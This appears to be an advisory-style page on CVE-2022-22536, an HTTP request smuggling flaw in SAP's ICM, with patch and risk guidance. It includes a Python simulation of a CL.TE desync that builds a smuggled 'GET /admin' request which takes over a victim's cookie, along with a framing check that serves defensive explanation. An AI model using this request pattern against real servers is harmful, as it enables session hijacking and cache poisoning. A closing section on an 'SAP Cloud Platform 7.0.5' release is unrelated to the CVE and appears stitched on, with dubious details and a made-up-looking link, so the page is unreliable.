CVE-2022-22536 SAP's NetWeaver Application Server ABAP, Java, Content Server 7.53 and Web Dispatcher are vulnerable to HTTP request smuggling and request concatenation.

SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to HTTP request smuggling and request concatenation in the Internet Communication Manager (ICM), the component that terminates HTTP for these products. An unauthenticated attacker who can reach the ICM over the network can prepend a victim's request with arbitrary data. The back end then processes the attacker-chosen request under the victim's session (impersonating the victim), and an intermediary Web cache that keyed the exchange on the victim's URL stores the attacker-chosen response under it (cache poisoning). No user interaction is required, and the vulnerability carries a CVSS score of 10.0. A successful attack could result in complete compromise of the confidentiality, integrity and availability of the system.

SAP addresses all affected products in SAP Security Note 3123396, released on the February 2022 Security Patch Day. The correction ships as a kernel (ICM) and Web Dispatcher patch, so whether a system is fixed depends on its kernel patch level, not on its application release alone.
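To make the "prepend a victim's request with arbitrary data" mechanism concrete, the following is an added example, not SAP code and not the ICM-specific exploit: it models the generic failure class the advisory names, two HTTP parsers that disagree on where one request ends and the next begins. The front end and back end here are assumed (a Content-Length-only framer in front of a Transfer-Encoding-aware back end, the classic CL.TE desync), and the request bytes are constructed for the example. It also shows the framing check a hardened front end should apply.

```python
from typing import Dict, List, Tuple

# (request line, lowercased headers, body)
Request = Tuple[str, Dict[str, str], bytes]


def _parse_head(stream: bytes, pos: int) -> Tuple[str, Dict[str, str], int]:
    """Parse the request line and headers at pos; return (request line, headers, body offset)."""
    end = stream.index(b"\r\n\r\n", pos)
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def _read_chunked(stream: bytes, pos: int) -> Tuple[bytes, int]:
    """Consume a chunked body (toy: no trailers, no chunk extensions); return (body, next offset)."""
    body = b""
    while True:
        line_end = stream.index(b"\r\n", pos)
        size = int(stream[pos:line_end].decode("latin-1"), 16)
        pos = line_end + 2
        if size == 0:
            return body, pos + 2          # skip the CRLF that ends the last-chunk
        body += stream[pos:pos + size]
        pos += size + 2                   # skip chunk data and its trailing CRLF


def split_front_end(stream: bytes) -> List[Request]:
    """Assumed front end: frames every request by Content-Length only."""
    requests: List[Request] = []
    pos = 0
    while pos < len(stream):
        line, headers, body_start = _parse_head(stream, pos)
        length = int(headers.get("content-length", "0"))
        requests.append((line, headers, stream[body_start:body_start + length]))
        pos = body_start + length
    return requests


def split_back_end(stream: bytes) -> List[Request]:
    """Assumed back end: honours Transfer-Encoding: chunked, otherwise Content-Length."""
    requests: List[Request] = []
    pos = 0
    while pos < len(stream):
        line, headers, body_start = _parse_head(stream, pos)
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, pos = _read_chunked(stream, body_start)
        else:
            length = int(headers.get("content-length", "0"))
            body, pos = stream[body_start:body_start + length], body_start + length
        requests.append((line, headers, body))
    return requests


def ambiguous_framing(stream: bytes) -> List[str]:
    """Hardening check: flag requests carrying both Content-Length and Transfer-Encoding,
    because two parsers in the chain may frame them differently. A front end should reject these."""
    return [line for line, headers, _ in split_front_end(stream)
            if "content-length" in headers and "transfer-encoding" in headers]


# Constructed traffic: the attacker's request, followed on the same connection by a victim's.
# The smuggled prefix ends with a dangling header name so the victim's request line is
# swallowed into it and the victim's Cookie header lands on the attacker's request.
SMUGGLED = b"0\r\n\r\nGET /admin HTTP/1.1\r\nX-Ignore: "
ATTACKER = (
    b"POST /login HTTP/1.1\r\nHost: target\r\n"
    + b"Content-Length: %d\r\n" % len(SMUGGLED)
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + SMUGGLED
)
VICTIM = b"GET /account HTTP/1.1\r\nHost: target\r\nCookie: session=victim\r\n\r\n"
STREAM = ATTACKER + VICTIM


def victim_as_seen_by_back_end() -> Request:
    """The second request the back end sees: attacker's prefix glued onto the victim's request."""
    return split_back_end(STREAM)[1]


if __name__ == "__main__":
    print("front end sees:", [r[0] for r in split_front_end(STREAM)])
    print("back end sees: ", [r[0] for r in split_back_end(STREAM)])
    line, headers, _ = victim_as_seen_by_back_end()
    print("victim's cookie now rides on:", line, "| cookie =", headers.get("cookie"))
    print("requests a hardened front end would reject:", ambiguous_framing(STREAM))
```

The front end believes it forwarded `POST /login` and then the victim's `GET /account`; the back end instead executes `GET /admin` with `Cookie: session=victim`, which is the impersonation case from the advisory. A cache sitting at the front end keys the second response on `/account`, so the `/admin` response is stored and served to later visitors under the victim's URL, which is the cache-poisoning case. The real ICM defect is in its own request pipeline rather than in this CL.TE pair, but the consequence is the same: arbitrary bytes prepended to another user's request.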

Check if you are vulnerable

If you run any of the affected products (SAP NetWeaver Application Server ABAP or Java, ABAP Platform, SAP Content Server 7.53 or SAP Web Dispatcher), compare the installed kernel and Web Dispatcher patch levels against SAP Security Note 3123396 and apply the corrected patch it references. Because the fix lives in the kernel, a system shows the same application release before and after patching; verify the kernel patch level, not the release number. Also review any intermediary Web caches and load balancers in front of the ICM, since entries poisoned before patching are not cleared by the patch.

What is the current state of the fix?

SAP Security Note 3123396 (February 2022) addresses CVE-2022-22536 for all affected products; there is no separate later fix schedule. The note's kernel and Web Dispatcher patches are the correction, and SAP's guidance is to apply them promptly given the unauthenticated, network-reachable nature of the flaw.

Security Risk Assessments and Risk Management

It is important to conduct security risk assessments and to implement controls and mitigation strategies. For example, if an application is at high risk of compromise, consider isolating it in a separate environment that does not contain production data, so that a successful request-smuggling attack against it cannot reach production sessions or data.

What’s new in the SAP Cloud Platform 7.0.5 release?

SAP Cloud Platform 7.0.5 includes the following new features and improvements:
- SAP Cloud Platform 7.0.5 is now available to all licensed users without a dependency on the SAP HANA Cloud Service or the SAP Base Services;
- The standard subscription term of a Full Support Subscription has been extended from 9 months to 12 months with the release of SAP Cloud Platform 7.0.5;
- Enhanced security questions and two-factor authentication are now available for all hybrid cloud instances to protect against unauthorized access;
- In addition to read-only data sources, you can now also add writeable data sources in SAP Cloud Platform; and
- Additional information about the changes in this release can be found at http://helpcenter.sap.com/hc/en-us/articles/360000000002294---New_in_SAP_Cloud_Platform_7__5_.
